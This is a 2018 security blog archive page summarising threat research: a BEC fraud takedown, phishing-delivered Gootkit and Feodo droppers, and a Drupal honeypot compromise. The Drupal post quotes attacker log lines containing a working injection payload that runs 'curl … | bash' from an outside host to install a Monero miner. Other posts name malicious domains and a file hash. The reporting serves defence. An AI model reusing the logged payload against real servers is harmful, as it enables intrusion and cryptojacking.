Operation WireWire – ACH Fraud Takedown

Posted by rp on June 12, 2018 in News

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland. The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.” (DOJ.gov)

Business Email Compromise (BEC) is a type of scam targeting companies who conduct wire transfers and have suppliers abroad.  Corporate or publicly available email accounts of executives or high-level employees related to finance or involved with wire transfer payments are either spoofed or compromised through keyloggers or phishing attacks to do fraudulent transfers, resulting in hundreds of thousands of dollars in losses. (Trend Micro)

I’ve seen recent comments in the media about how this DOJ crackdown wouldn’t put a big dent, or really wouldn’t have an impact given the breadth of fraud associated with Business E-mail Compromise, or BEC.… Read the article

Tags: , , , , , , , , , ,


SWIFT E-mail Leads To Evasive Gootkit

Posted by rp on June 11, 2018 in News


We follow the trail of another spam e-mail. It’s delivering a malware downloader that’s 0/63 on Virustotal, not unheard of these days. The e-mail had a PDF attachment SWIFT-MT103.pdf which itself was innocuous and simply displayed a fuzzy scan image, purportedly a SWIFT request that linked to a file hosted on Box.com.

Tactics of the downloader/dropper:

Contains functionality for read data from the clipboard
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Detected TCP or UDP traffic on non-standard ports
Sample file is different than original file name gathered from version info
Internet Provider seen in connection with other malware
Icon mismatch, PE includes an icon from a different legit application
Reads the hosts file

…and many other warning signs shown by the software in deeper debugging in included in the report.

Received: from vps39646.inmotionhosting.com (vps39646.inmotionhosting.com
(envelope-from <info@globalrustrade.com>)

Reply-To: <sunshineslisa1@yahoo.com>
Date: Tue, 12 Jun 2018 01:42:52 +0000

A copy of the original e-mail received to a honeypot spam account:

Download the attached PDF, and examine it finding a link:

SWIFT MT103 PDF from E-mail 


Download the file from a box.com link, and unzip the contents:


Analysis on the dropper downloaded from this link:

SWIFT MT103 Joe Sandbox Report

or directly from Joe Sandbox if you don’t trust my PDF.… Read the article

Tags: , , , , , ,


Suppoie Crypto Hijack

Posted by rp on April 24, 2018 in News

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to pull down a jpeg image, which turned out to be a script. The script connects to a Monero mining pool, and starts mining crypto from the server automatically. Vulnerability used is via Curl in this version of Drupal.

Here’s all of the traffic from the attacker: - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby" - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby" - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"


The file logo7.jpg pulled down from gmicameroon.com site is a script that runs the miner in /var/tmp/suppoie running as www-data on the device:


Created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json.… Read the article

Tags: , , , ,


Feodo Banking Trojan – Dropper Analysis

Posted by rp on April 2, 2018 in News

It all started with an e-mail from NYU: Received: from mx5.nyu.edu (MX5.NYU.EDU [])

"From: xxxx xxxx <xxxxx@nyu.edu> 
Sent: Monday, April 2, 2018 9:36 AM
To: Infostruction
Subject: ACH Payment Advice
Good Afternoon,
Please double check the payment for April 02, I have attached the WIRE. Invoice 98914 was paid on 04.01.2018. 
I want to make sure we are both on the same page.
Thank you for your business!
xxxxx xxxx"


We analyzed the malicious document this website ( dropped:

SHA-256 f12642b8eb36637abaa85adbd559d056c36e2e013ca8f429236cd1fe0609c56a
File name WIRE-FORM-DA-280819104.doc
17 engines detected this file

File names included WIRE-FORM-DA-280819104.doc, and ACH-FORM-GMU-89664246207.doc. As you may already know, these will change randomly. The doc launched cmd.exe, which launched powershell with an obfuscated script. It drops C:\Users\Public\183480.exe, file connects to frameyourdreams.in, IP (WEDOS-HOSTING CZ), (Online SAS),, and (OVH Hosting, Inc.).
Read the article

Tags: , ,


OVH Hosting – Web Security Headache

Posted by rp on March 22, 2018 in News

*** Update – 4/6/2018 – We’ve received 125,027 connections from this provider since the blog was posted. A block by ARIN name helps us cover more space, so OVH Hosting, Inc, and OVH SAS are completely blocked from our websites.

Why do Canadians love the Infostruction blog so much? This is a question I set out to answer after looking at our Web Application Firewall (WAF) logs over the past 48-hours, and beyond. I’ve got 60k connections from 39 different IPs that belong to OVH Hosting Inc, all hailing from Canada. I let them know about this issue back when it started, and blocked all of the networks owned by this company. Since then, it’s been a constant flood of connections from OVH, and no response from the security/abuse team. I don’t expect one, so I’m writing here to warn you, if you see a large amount of connections, we recommend blocking the IPs below at a minimum. The real problem comes with the volume, and the fact that they are relentless, never stopping to rest. These connections come 24x7x365, and look like some sort of crawler, or scraper. The issue is they do not present a legitimate useragent for that kind of bot, and so we have no idea why they are accessing all of the content repeatedly, for days on end.… Read the article

Tags: , ,

Copyright © 2018 INFOSTRUCTION All rights reserved.

2 visitors online now
1 guests, 1 bots, 0 members
Max visitors today: 7 at 01:21 am UTC
This month: 17 at 06-08-2018 10:23 am UTC
This year: 139 at 05-31-2018 10:11 am UTC
All time: 139 at 05-31-2018 10:11 am UTC